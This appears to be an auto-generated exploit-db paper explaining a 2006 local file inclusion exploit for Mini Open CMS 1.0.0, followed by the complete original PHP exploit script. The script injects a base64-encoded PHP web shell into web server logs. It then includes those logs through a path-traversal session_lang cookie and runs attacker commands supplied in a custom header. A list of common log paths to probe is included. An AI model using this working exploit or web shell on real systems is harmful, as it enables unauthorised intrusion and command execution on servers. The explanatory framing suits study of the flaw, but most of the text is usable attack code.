By exploitdb papers bot•November 17, 2006•
papers
Understanding Local File Inclusion: The miniCWB 1.0.0 Exploit
Understanding Local File Inclusion: The miniCWB 1.0.0 Exploit
What this paper is
This paper details a Local File Inclusion (LFI) vulnerability in version 1.0.0 of the Mini Open CMS web application. The exploit, written by Kacper (a.k.a Rahim) and published by DEVIL TEAM, leverages this vulnerability to execute arbitrary commands on the server. The core of the exploit involves manipulating the contact.php script to include and display the contents of sensitive files, such as log files, which can then be used to inject and execute commands.
Simple technical breakdown
The vulnerability lies in how the contact.php script handles user-supplied input for language selection. Specifically, it uses a variable $NEWLANG which is derived from a session variable $session_lang. This $session_lang variable is supposed to be set based on a configuration file or a session. However, if register_globals is enabled on the server, an attacker can directly control $session_lang via HTTP request parameters.
The script then uses this $NEWLANG variable in an include_once statement: include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php");. By providing a path traversal sequence (like ../) followed by a log file path, an attacker can trick the server into including and displaying the content of that log file.
The exploit script first attempts to inject a PHP payload into a web server's log file. This payload is designed to execute a command provided by the attacker. It then crafts a request to contact.php with a manipulated session_lang cookie, pointing to the log file path. If successful, the contact.php script will include the log file, thereby executing the injected PHP code and running the attacker's command.
Complete code and payload walkthrough
The provided PHP script is a command-line tool designed to exploit the LFI vulnerability. Let's break down its components:
ASCII Art and Header Information
<?
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ :+: :+:
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ :+: +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: Mini Open CMS <= 1.0.0 Local File Include Exploit
[Script name: Mini Open CMS v.1.0.0
[Script site: http://www.mini-open-cms.com/
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky, xoron,
and
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';This section is purely informational. It displays ASCII art, the exploit's name, version, author, contact information, and greetings to various individuals and groups. It doesn't perform any technical function.
Vulnerability Context and Code Snippet
/*
works with register_globals=On
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in contact.php on line 14-34:
....
header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
session_start();
//session_regenerate_id();
include_once("./config.inc.php");
if (!isset($_SESSION['session_lang'])) // <-------{1}
{
$session_lang = $LANG;
$_SESSION['session_lang']=$session_lang; // <-------{2}
}
else
$session_lang=$_SESSION['session_lang'];// end if
include_once(INDEX_PATH."cls_fast_template.php");
$NEWLANG = $session_lang; // <-------{3}
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // <-------{4}
include_once(INCLUDE_PATH."cls_string.php");
include_once(INCLUDE_PATH."cls_universal_mailsender.php");
include_once(INCLUDE_PATH."cls_miniFile.php");
include_once(INCLUDE_PATH."cls_pages.php");
include_once(INCLUDE_ADMIN_PATH."cls_arrays.php");
....
*/This commented-out section provides crucial context. It highlights that the exploit relies on register_globals=On. It then shows a snippet from contact.php where:
session_start()is called.- A session variable
$_SESSION['session_lang']is managed. - If the session variable is not set, it defaults to
$LANG. - The
$session_langvariable is assigned to$NEWLANG({3}). - Finally,
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php");({4}) is used. This is the vulnerable line. If$NEWLANGcan be controlled by the attacker and contains path traversal characters, it can lead to LFI.
Command-Line Argument Parsing
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: Mini_Open path
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Mini_Open/ ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / ls -la
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);if ($argc<4): Checks if the script received at least 4 arguments (script name, host, path, and at least one command part). If not, it prints usage instructions and exits.error_reporting(0);: Suppresses PHP error messages.ini_set("max_execution_time",0);: Sets the maximum execution time to unlimited.ini_set("default_socket_timeout",5);: Sets a default timeout of 5 seconds for socket operations.
sendpacket Function
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}This function handles sending HTTP requests.
- It takes a
$packetstring as input. - It uses global variables
$proxy,$host,$port,$html, and$proxy_regex. - If no proxy is specified (
$proxy == ''):- It opens a socket connection to the target
$hoston the specified$portusingfsockopen. - If the connection fails, it prints an error and exits.
- It opens a socket connection to the target
- If a proxy is specified:
- It validates the proxy format using
$proxy_regex. - It connects to the proxy server.
- If the proxy connection fails, it prints an error and exits.
- It validates the proxy format using
- It sends the
$packetto the server/proxy usingfputs. - It reads the response from the server/proxy:
- If no proxy is used, it reads line by line until the end of the file (
fgets). - If a proxy is used, it reads byte by byte until it encounters a double CRLF (
\r\n\r\n), which signifies the end of HTTP headers.
- If no proxy is used, it reads line by line until the end of the file (
- It closes the socket connection.
quick_dump Function
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}This function takes a string and formats it for display, showing both its hexadecimal representation and its printable ASCII characters. It's a utility for debugging or displaying raw data.
Global Variable Initialization and Argument Processing
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}$proxy_regex: Defines a regular expression to validate proxy IP:port formats.make_seed(): A function to generate a seed for random number generation (though not used in this specific exploit logic).$host,$path: These are populated from the first two command-line arguments.$cmd: This variable will store the shell command to be executed, built from subsequent arguments.- The loop (
for ($i=3; $i<$argc; $i++)) processes the remaining command-line arguments:- It checks for
-p(port) and-P(proxy) options. - If an argument is not a port or proxy option, it's appended to the
$cmdstring. -poption: extracts the port number.-Poption: extracts the proxy address.
- It checks for
$p: This variable constructs the base path for requests. If a proxy is used, it prependshttp://host:port. Otherwise, it just uses the provided$path.
Stage 1: Injecting Payload into Log Files
echo "insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$packet="GET ".$p.$hauru." HTTP/1.0\r\n";
$packet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacket($packet);
sleep(3);echo "insert evil code in logfiles ...\r\n\r\n";: Informs the user about the next step.$hauru = base64_decode(...): This is the core of the payload injection. The Base64 string decodes to the following PHP code:<?php ob_clean(); //Ruchomych zamek Hauru ;)echo "I am.Hacker.Kacper.Made.in.Poland!....DEVIL.TEAM.the.best.polish.team.Greetz...". echo "..Go To DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";echo "..DEVIL TEAM SITE: http://www.rahim.webd.pl/ ";ini_set("max_execution_time",0);echo "Hauru";passthru($_SERVER[HTTP_HAURU]);die;?>ob_clean(): Clears any output buffer.- Prints some congratulatory messages and contact information.
ini_set("max_execution_time",0);: Ensures the command execution doesn't time out.echo "Hauru";: Prints a marker string "Hauru". This is important for the next stage to detect if the injection was successful.passthru($_SERVER[HTTP_HAURU]);: This is the command execution part. It takes the value of theHAURUHTTP header (which will be supplied by the attacker in the next request) and executes it as a shell command.die;: Exits the script after execution.
$packet: Constructs an HTTP GET request. The crucial part here is that the$hauru(the decoded PHP payload) is appended directly to the path. This means the script is trying to access a URL like/path/<?php ob_clean(); ... die;?>. This is a common technique to inject PHP code into web server logs when the server logs the requested URL. The web server might log this entire string as a request, and if that log file is later included by a vulnerable script, the PHP code within the logged URL can be executed.User-Agent: ".$hauru." Googlebot/2.1\r\n": The User-Agent header also contains the injected PHP code. This is another attempt to get the code logged.Host: ".$host."\r\n": Specifies the target host.Connection: close\r\n\r\n: Standard HTTP headers.sendpacket($packet);: Sends this crafted request.sleep(3);: Pauses for 3 seconds, presumably to allow the web server to log the request.
Stage 2: Exploiting LFI to Execute Commands
$paths= array (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$packet ="GET ".$p."contact.php HTTP/1.1\r\n";
$packet.="Cookie: session_lang=../".$paths[$i]."%00;\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>$paths: An array containing a list of common log file paths across different server configurations. These are used for path traversal.- The
forloop iterates through each path in the$pathsarray. $a=$i+2;: This is a simple counter for display purposes, starting from 2 (since the first two arguments are host and path).echo "[".$a."] Check Path: ".$paths[$i]."\r\n";: Displays the path being checked.echo "remote code execution...wait..\n";: Indicates the attempt to execute code.$packet: This is the crucial request to trigger the LFI.GET ".$p."contact.php HTTP/1.1\r\n: It targets thecontact.phpscript.Cookie: session_lang=../".$paths[$i]."%00;\r\n: This is the exploit payload.session_lang=: It attempts to set thesession_langvariable.../".$paths[$i]: This is the path traversal. It uses../to move up directories and then appends the current log file path from the$pathsarray.%00;: The null byte (%00) is used to null-terminate the string. In older PHP versions (before 5.3.0), null bytes could truncate string operations, preventing the.inc.phpfrom being appended by theinclude_oncefunction, effectively making the script include the log file directly. The semicolon is there to properly terminate the cookie value.
HAURU: ".$cmd."\r\n: This header contains the actual shell command ($cmd) that the attacker wants to execute. This value will be picked up by$_SERVER[HTTP_HAURU]in the injected PHP code.
sendpacket($packet);: Sends the crafted request.if (strstr($html,"Hauru")): Checks if the response ($html) contains the "Hauru" marker string. This indicates that the injected PHP code was executed.strstr($html,"Hauru"): Searches for the substring "Hauru" within the response.die($temp[1]);: If "Hauru" is found, it means the injected code ran and printed its output. The code splits the response by "Hauru" and prints the part after it, which should be the output of the executed command.
- If the loop finishes without finding "Hauru" in any response, it prints "Exploit err0r :(" and provides IRC contact information.
Mapping list: code fragment/block -> practical purpose
| Code Fragment/Block
Original Exploit-DB Content (Verbatim)
<?
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: Mini Open CMS <= 1.0.0 Local File Include Exploit
[Script name: Mini Open CMS v.1.0.0
[Script site: http://www.mini-open-cms.com/
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky, xoron,
and
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
works with register_globals=On
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in contact.php on line 14-34:
....
header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
session_start();
//session_regenerate_id();
include_once("./config.inc.php");
if (!isset($_SESSION['session_lang'])) // <-------{1}
{
$session_lang = $LANG;
$_SESSION['session_lang']=$session_lang; // <-------{2}
}
else
$session_lang=$_SESSION['session_lang'];// end if
include_once(INDEX_PATH."cls_fast_template.php");
$NEWLANG = $session_lang; // <-------{3}
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // <-------{4}
include_once(INCLUDE_PATH."cls_string.php");
include_once(INCLUDE_PATH."cls_universal_mailsender.php");
include_once(INCLUDE_PATH."cls_miniFile.php");
include_once(INCLUDE_PATH."cls_pages.php");
include_once(INCLUDE_ADMIN_PATH."cls_arrays.php");
....
*/
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: Mini_Open path
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Mini_Open/ ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / ls -la
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$packet="GET ".$p.$hauru." HTTP/1.0\r\n";
$packet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacket($packet);
sleep(3);
$paths= array (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$packet ="GET ".$p."contact.php HTTP/1.1\r\n";
$packet.="Cookie: session_lang=../".$paths[$i]."%00;\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>
# milw0rm.com [2006-11-17]